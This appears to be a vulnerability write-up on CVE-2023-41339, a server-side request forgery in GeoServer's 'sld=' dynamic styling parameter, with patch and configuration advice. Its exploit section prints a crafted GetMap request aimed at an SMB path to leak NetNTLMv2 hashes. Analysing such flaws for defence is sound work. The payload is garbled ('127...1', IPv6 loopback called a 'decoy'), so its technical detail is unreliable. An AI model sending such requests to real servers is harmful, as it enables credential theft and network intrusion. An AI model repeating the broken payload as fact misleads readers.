CVE-2023-41339: GeoServer Service Side Request Forgery (SSRF) Vulnerability Exploitation, Patch and Impact Analysis

GeoServer is a widely used open source software server, written in Java, which enables users to manage and share geospatial data. This powerful tool relies on web services standards such as Web Map Service (WMS). One of the features it provides is the ability for users to supply their own "dynamic styling" using the "sld=" parameter in GetMap, GetLegendGraphic, and GetFeatureInfo operations. However, this feature, if not configured properly, can lead to a Service Side Request Forgery (SSRF) vulnerability. In this post, we will dissect CVE-2023-41339, which exploits this vulnerability to steal user NetNTLMv2 hashes that could enable further unauthorized access to a targeted network. We will also discuss the patch introduced in GeoServer versions 2.22.5 and 2.23.2 to address this vulnerability.

Exploit Details

The core of the issue revolves around the improper handling of the "sld=" parameter when applying dynamic styles to GetMap, GetLegendGraphic, or GetFeatureInfo operations. An attacker can craft malicious URLs that send internal network requests, potentially stealing sensitive information such as user NetNTLMv2 hashes. These hashes could then be either relayed or cracked to gain unauthorized access to a system.

Here is an example of a malicious GET request utilizing the SSRF vulnerability

GET /geoserver/wms?request=GetMap&sld=http://%5B::1%5D:%5C%5C%5C%5C127...1%5CSMB%5Cexploit HTTP/1.1
Host: vulnerable_geoserver

In this example, the "sld=" parameter is used to send a request to an internal SMB server (127...1\Share) using the IPv6 loopback address (::1) as a decoy. This request may cause the server to disclose sensitive user information, such as the NetNTLMv2 hash.

Patch and Affected Versions

The GeoServer development team has acknowledged this vulnerability and has implemented a patch in versions 2.22.5 and 2.23.2. Upgrading to these versions would mitigate the SSRF vulnerability and prevent potential attacks. Details about the patches can be found in the release notes here:

- GeoServer 2.22.5 Release Notes
- GeoServer 2.23.2 Release Notes

To further secure your GeoServer instance, it's recommended to properly configure and enable URL checks for dynamic styles, as described in the official GeoServer documentation:

- GeoServer: Enabling Dynamic Styles

Conclusion

The SSRF vulnerability in GeoServer (CVE-2023-41339) poses a significant risk for unpatched systems, as attackers can potentially leverage it to steal sensitive user information, such as NetNTLMv2 hashes. By upgrading to GeoServer versions 2.22.5 or 2.23.2, and ensuring proper configuration of dynamic styles with URL checks, you can significantly improve the security posture of your geospatial data server and mitigate the risks associated with this vulnerability.

Timeline

Published on: 10/25/2023 18:17:30 UTC
Last modified on: 10/31/2023 19:53:57 UTC